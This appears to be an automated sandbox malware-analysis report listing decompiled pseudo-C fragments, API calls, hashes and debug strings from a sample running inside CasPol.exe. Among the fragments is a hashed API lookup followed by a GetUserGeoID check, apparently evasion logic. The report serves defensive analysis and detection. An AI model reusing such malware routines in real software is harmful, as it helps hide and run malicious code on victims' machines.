                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00409a63
                                                                                                                                                                                                                                                                                                0x00409a63
                                                                                                                                                                                                                                                                                                0x00409a67
                                                                                                                                                                                                                                                                                                0x00409a83
                                                                                                                                                                                                                                                                                                0x00409a8b
                                                                                                                                                                                                                                                                                                0x00409a93
                                                                                                                                                                                                                                                                                                0x00409a98
                                                                                                                                                                                                                                                                                                0x00409aa0
                                                                                                                                                                                                                                                                                                0x00409aa0
                                                                                                                                                                                                                                                                                                0x00409aa8
                                                                                                                                                                                                                                                                                                0x00409ab0
                                                                                                                                                                                                                                                                                                0x00409ab2
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00409ab4
                                                                                                                                                                                                                                                                                                0x00409ab4
                                                                                                                                                                                                                                                                                                0x00409aba
                                                                                                                                                                                                                                                                                                0x00409abd
                                                                                                                                                                                                                                                                                                0x00409ac3
                                                                                                                                                                                                                                                                                                0x00409ac6
                                                                                                                                                                                                                                                                                                0x00409acc
                                                                                                                                                                                                                                                                                                0x00409acc
                                                                                                                                                                                                                                                                                                0x00409ad3
                                                                                                                                                                                                                                                                                                0x00409ad5
                                                                                                                                                                                                                                                                                                0x00409ad8
                                                                                                                                                                                                                                                                                                0x00409ad8
                                                                                                                                                                                                                                                                                                0x00409adf
                                                                                                                                                                                                                                                                                                0x00409ae2
                                                                                                                                                                                                                                                                                                0x00409ae9
                                                                                                                                                                                                                                                                                                0x00409aef
                                                                                                                                                                                                                                                                                                0x00409af5
                                                                                                                                                                                                                                                                                                0x00409afb
                                                                                                                                                                                                                                                                                                0x00409b01
                                                                                                                                                                                                                                                                                                0x00409b07
                                                                                                                                                                                                                                                                                                0x00409b0d
                                                                                                                                                                                                                                                                                                0x00409b12
                                                                                                                                                                                                                                                                                                0x00409b17
                                                                                                                                                                                                                                                                                                0x00409b1d
                                                                                                                                                                                                                                                                                                0x00409b1f
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00409b25
                                                                                                                                                                                                                                                                                                0x00409b25
                                                                                                                                                                                                                                                                                                0x00409b28
                                                                                                                                                                                                                                                                                                0x00409b28
                                                                                                                                                                                                                                                                                                0x00409b2f
                                                                                                                                                                                                                                                                                                0x00409b35
                                                                                                                                                                                                                                                                                                0x00409b3b
                                                                                                                                                                                                                                                                                                0x00409b41
                                                                                                                                                                                                                                                                                                0x00409b47
                                                                                                                                                                                                                                                                                                0x00409b53
                                                                                                                                                                                                                                                                                                0x00409b5b
                                                                                                                                                                                                                                                                                                0x00409b61
                                                                                                                                                                                                                                                                                                0x00409b67
                                                                                                                                                                                                                                                                                                0x00409b71
                                                                                                                                                                                                                                                                                                0x00409b79
                                                                                                                                                                                                                                                                                                0x00409b7f
                                                                                                                                                                                                                                                                                                0x00409b81
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00409b87
                                                                                                                                                                                                                                                                                                0x00409b87
                                                                                                                                                                                                                                                                                                0x00409b8d
                                                                                                                                                                                                                                                                                                0x00409b8d
                                                                                                                                                                                                                                                                                                0x00409b93
                                                                                                                                                                                                                                                                                                0x00409ba0
                                                                                                                                                                                                                                                                                                0x00409ba2
                                                                                                                                                                                                                                                                                                0x00409ba6
                                                                                                                                                                                                                                                                                                0x00409bab
                                                                                                                                                                                                                                                                                                0x00409bae
                                                                                                                                                                                                                                                                                                0x00409bae
                                                                                                                                                                                                                                                                                                0x00409bb5
                                                                                                                                                                                                                                                                                                0x00409bbe
                                                                                                                                                                                                                                                                                                0x00409bc4
                                                                                                                                                                                                                                                                                                0x00409bc6
                                                                                                                                                                                                                                                                                                0x00409bcb
                                                                                                                                                                                                                                                                                                0x00409bce
                                                                                                                                                                                                                                                                                                0x00409bcf
                                                                                                                                                                                                                                                                                                0x00409bd0
                                                                                                                                                                                                                                                                                                0x00409bd1
                                                                                                                                                                                                                                                                                                0x00409bd3
                                                                                                                                                                                                                                                                                                0x00409bd4
                                                                                                                                                                                                                                                                                                0x00409bd4
                                                                                                                                                                                                                                                                                                0x00409b81
                                                                                                                                                                                                                                                                                                0x00409b1f
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00409a67
                                                                                                                                                                                                                                                                                                0x00409a61
                                                                                                                                                                                                                                                                                                0x00409a58
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00409a4f
                                                                                                                                                                                                                                                                                                0x00409a7a
                                                                                                                                                                                                                                                                                                0x00409a7b
                                                                                                                                                                                                                                                                                                0x00409a7c
                                                                                                                                                                                                                                                                                                0x00409a7c
                                                                                                                                                                                                                                                                                                0x00409a7e
                                                                                                                                                                                                                                                                                                0x00409a7f
                                                                                                                                                                                                                                                                                                0x00409a81
                                                                                                                                                                                                                                                                                                0x00409a82
                                                                                                                                                                                                                                                                                                0x00409a82
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(0000A3E5,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00409976
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1836367815-0
                                                                                                                                                                                                                                                                                                • Opcode ID: da7c32538520bc46c9b883dd194686ad874100c3146dbe5130bb82354df0f293
                                                                                                                                                                                                                                                                                                • Instruction ID: 648afeff1364fdba1a395c652430271767a4361657bae9f95ab056a44fdb6ef5
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: da7c32538520bc46c9b883dd194686ad874100c3146dbe5130bb82354df0f293
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D201A7B2A4031476E6215651EC83FAF2358DB84B14F14412EFE04BA2C2D5EDAD0546E9
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0041E863 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 186 41e863-41e894 call 41f203 RtlAllocateHeap
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0041E863(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				_t3 = _a4 + 0xa9c; // 0xa9c
				E0041F203( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                                                                                                                                                                                                                                0x0041e872
                                                                                                                                                                                                                                                                                                0x0041e87a
                                                                                                                                                                                                                                                                                                0x0041e890
                                                                                                                                                                                                                                                                                                0x0041e894

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00418C66,?,00419410,00419410,?,00418C66,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0041E890
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                • Opcode ID: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                                                                                                                                                                                                                • Instruction ID: 141f3d952d026ec1b8dbe03c6c75eaaf96d710a32fd8771451468f3a68ee1817
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bededf418e3a0274c804535d3b84133155b4e078891fc5e6f2d2b0bfe9395de7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60E046B6600208ABCB14EF89DC45EE737ACEF88764F018059FE085B242C630F914CAF1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 004100C3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 181 4100c3-4100e7 call 4195b3 184 4100e9-4100ea 181->184 185 4100eb-4100fc GetUserGeoID 181->185
                                                                                                                                                                                                                                                                                                C-Code - Quality: 37%
                                                                                                                                                                                                                                                                                                			E004100C3(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E004195B3(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                                                                                                                                                                                                                                                                0x004100dd
                                                                                                                                                                                                                                                                                                0x004100e7
                                                                                                                                                                                                                                                                                                0x004100ed
                                                                                                                                                                                                                                                                                                0x004100fc
                                                                                                                                                                                                                                                                                                0x004100ea
                                                                                                                                                                                                                                                                                                0x004100ea
                                                                                                                                                                                                                                                                                                0x004100ea

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetUserGeoID.KERNELBASE(00000010), ref: 004100ED
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: User
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 765557111-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 3665d6d1dd050c5fb0c9089e6286accebc5acb218c0c3a233921f7441bb6933e
                                                                                                                                                                                                                                                                                                • Instruction ID: d3a3e2032565f6d34a55456b5a80270182852c25dcf9d34bac0e0dafc7ea0ddc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3665d6d1dd050c5fb0c9089e6286accebc5acb218c0c3a233921f7441bb6933e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 62E0C27378030467FA2091A59C42FBA364F5B84B00F048475F90CE62C2D5A8E8C00028
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0041E8A3 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                control_flow_graph 189 41e8a3-41e8b9 190 41e8bf-41e8d4 RtlFreeHeap 189->190 191 41e8ba call 41f203 189->191 191->190
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,F162D13C,00000000,?), ref: 0041E8D0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                                                                                                                                                                                                • Instruction ID: 81649b4115f882acd630a205a6666d0b6fa7ed995dd6d0d074ea88b8b0e80a3e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1EE012B6600208ABCB14EF89DC49EA737ACAF88754F018059FE095B282C630E914CAB1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0041EA03 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0041EA03(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041F203( *((intOrPtr*)(_a4 + 0x6d4)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x6d4)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                                                                                                                                                                                                                                                0x0041ea1d
                                                                                                                                                                                                                                                                                                0x0041ea33
                                                                                                                                                                                                                                                                                                0x0041ea37

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FF15,0040FF15,?,00000000,?,?), ref: 0041EA33
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3899507212-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 6d17ae0a135bda1b9bbb818c9fdfe1c64cd34d76a27bf27ed8ea69783f8a8f5a
                                                                                                                                                                                                                                                                                                • Instruction ID: 26638fb517edf30d6313ba082fa82f18f9a37f2b762b1a37e3fac1042cbd1374
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d17ae0a135bda1b9bbb818c9fdfe1c64cd34d76a27bf27ed8ea69783f8a8f5a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 83E01AB56002086BC710DF89DC45EE737ADAF88654F014065FE0857242C635E8148BB5
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0041E8D7 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                                			E0041E8D7(intOrPtr _a4, int _a8) {

				asm("adc eax, 0xbb2eba75");
				_t7 = _a4;
				E0041F203( *((intOrPtr*)(_a4 + 0x6d0)), _t7, _t7 + 0xaa8,  *((intOrPtr*)(_a4 + 0x6d0)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                                                                                                                                                                                                                                                0x0041e8d7
                                                                                                                                                                                                                                                                                                0x0041e8e6
                                                                                                                                                                                                                                                                                                0x0041e8fd
                                                                                                                                                                                                                                                                                                0x0041e90b

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E90B
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                                • Opcode ID: a5fb50388cdf821a489fea839f38f53be1195a719a8b2915b7934d74684e0527
                                                                                                                                                                                                                                                                                                • Instruction ID: 5c0109bf3c017ec3e38722d5e3a7691f356bf1999787dbf9d42864a55b6ec0fa
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5fb50388cdf821a489fea839f38f53be1195a719a8b2915b7934d74684e0527
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3E08C36A00210BBCB209F85CC86FD737A8EF85690F1480A8B9595B341D278EA41C7E1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0041E8E3 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                                			E0041E8E3(intOrPtr _a4, int _a8) {

				_t5 = _a4;
				E0041F203( *((intOrPtr*)(_a4 + 0x6d0)), _t5, _t5 + 0xaa8,  *((intOrPtr*)(_a4 + 0x6d0)), 0, 0x36);
				ExitProcess(_a8);
			}



                                                                                                                                                                                                                                                                                                0x0041e8e6
                                                                                                                                                                                                                                                                                                0x0041e8fd
                                                                                                                                                                                                                                                                                                0x0041e90b

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041E90B
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ExitProcess
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 191224e0ceac810c9efb7ccbd1f96fb57d99ee79d09e325168da16ef873e870b
                                                                                                                                                                                                                                                                                                • Instruction ID: b4e5e56741419d1f277733bd979a6942edbd6e735fed61574da432c381a3350b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 191224e0ceac810c9efb7ccbd1f96fb57d99ee79d09e325168da16ef873e870b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34D0C232B002047BC620DF88CC45FD3379CDF44650F0080A5BA0C5B241C631BA00C7E0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0041E897 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,F162D13C,00000000,?), ref: 0041E8D0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396370553.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                                • Opcode ID: e4832b0115aa284da7ecc9123bae4915b8569b1c6ca6ff1ef97e8e89f529ccc7
                                                                                                                                                                                                                                                                                                • Instruction ID: 750e433a6b7849f822becc92f6b04cfcf815011e590c3758b4f193371c1a9ae6
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e4832b0115aa284da7ecc9123bae4915b8569b1c6ca6ff1ef97e8e89f529ccc7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 18E0C2B92083846FD700EF65C8408E77BA4EF89304714889EFCEA47202C331D86A8BB0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 0176967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 823be80f2958445d043060c798fe63d5d6bd981444234b8480c75af45027bcef
                                                                                                                                                                                                                                                                                                • Instruction ID: ec1d6316e0333c77409d119ad58c22b7545d10117bf9b7520f36dc85f8fad36b
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 823be80f2958445d043060c798fe63d5d6bd981444234b8480c75af45027bcef
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1B09B719055C5CDEA11D7A44708717F9047BD4745F16C061D2020641B4778C491F5B5
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                                                                Function 017DB260 Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 017DB314
                                                                                                                                                                                                                                                                                                • The resource is owned shared by %d threads, xrefs: 017DB37E
                                                                                                                                                                                                                                                                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 017DB2F3
                                                                                                                                                                                                                                                                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 017DB2DC
                                                                                                                                                                                                                                                                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 017DB39B
                                                                                                                                                                                                                                                                                                • an invalid address, %p, xrefs: 017DB4CF
                                                                                                                                                                                                                                                                                                • write to, xrefs: 017DB4A6
                                                                                                                                                                                                                                                                                                • <unknown>, xrefs: 017DB27E, 017DB2D1, 017DB350, 017DB399, 017DB417, 017DB48E
                                                                                                                                                                                                                                                                                                • The instruction at %p referenced memory at %p., xrefs: 017DB432
                                                                                                                                                                                                                                                                                                • Go determine why that thread has not released the critical section., xrefs: 017DB3C5
                                                                                                                                                                                                                                                                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 017DB53F
                                                                                                                                                                                                                                                                                                • The critical section is owned by thread %p., xrefs: 017DB3B9
                                                                                                                                                                                                                                                                                                • *** then kb to get the faulting stack, xrefs: 017DB51C
                                                                                                                                                                                                                                                                                                • *** enter .cxr %p for the context, xrefs: 017DB50D
                                                                                                                                                                                                                                                                                                • This failed because of error %Ix., xrefs: 017DB446
                                                                                                                                                                                                                                                                                                • *** Inpage error in %ws:%s, xrefs: 017DB418
                                                                                                                                                                                                                                                                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 017DB305
                                                                                                                                                                                                                                                                                                • The resource is owned exclusively by thread %p, xrefs: 017DB374
                                                                                                                                                                                                                                                                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 017DB352
                                                                                                                                                                                                                                                                                                • The instruction at %p tried to %s , xrefs: 017DB4B6
                                                                                                                                                                                                                                                                                                • read from, xrefs: 017DB4AD, 017DB4B2
                                                                                                                                                                                                                                                                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 017DB47D
                                                                                                                                                                                                                                                                                                • *** enter .exr %p for the exception record, xrefs: 017DB4F1
                                                                                                                                                                                                                                                                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017DB38F
                                                                                                                                                                                                                                                                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 017DB323
                                                                                                                                                                                                                                                                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 017DB476
                                                                                                                                                                                                                                                                                                • *** An Access Violation occurred in %ws:%s, xrefs: 017DB48F
                                                                                                                                                                                                                                                                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 017DB484
                                                                                                                                                                                                                                                                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017DB3D6
                                                                                                                                                                                                                                                                                                • a NULL pointer, xrefs: 017DB4E0
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                                                                                                                                                                                                                                                • API String ID: 0-108210295
                                                                                                                                                                                                                                                                                                • Opcode ID: b5bd579286bfd14fdb7b27a031a931f16c29b2780bcbcef70c6c9d2459185201
                                                                                                                                                                                                                                                                                                • Instruction ID: efc932a8d8140d499c83e1bc80127e704fd69492081e855041460f6616ed2b3d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5bd579286bfd14fdb7b27a031a931f16c29b2780bcbcef70c6c9d2459185201
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66812475A00214FFDB229E8ACC9DEABFB35EF57A51F420088F5042B11AD7768501DAB2
                                                                                                                                                                                                                                                                                                Uniqueness

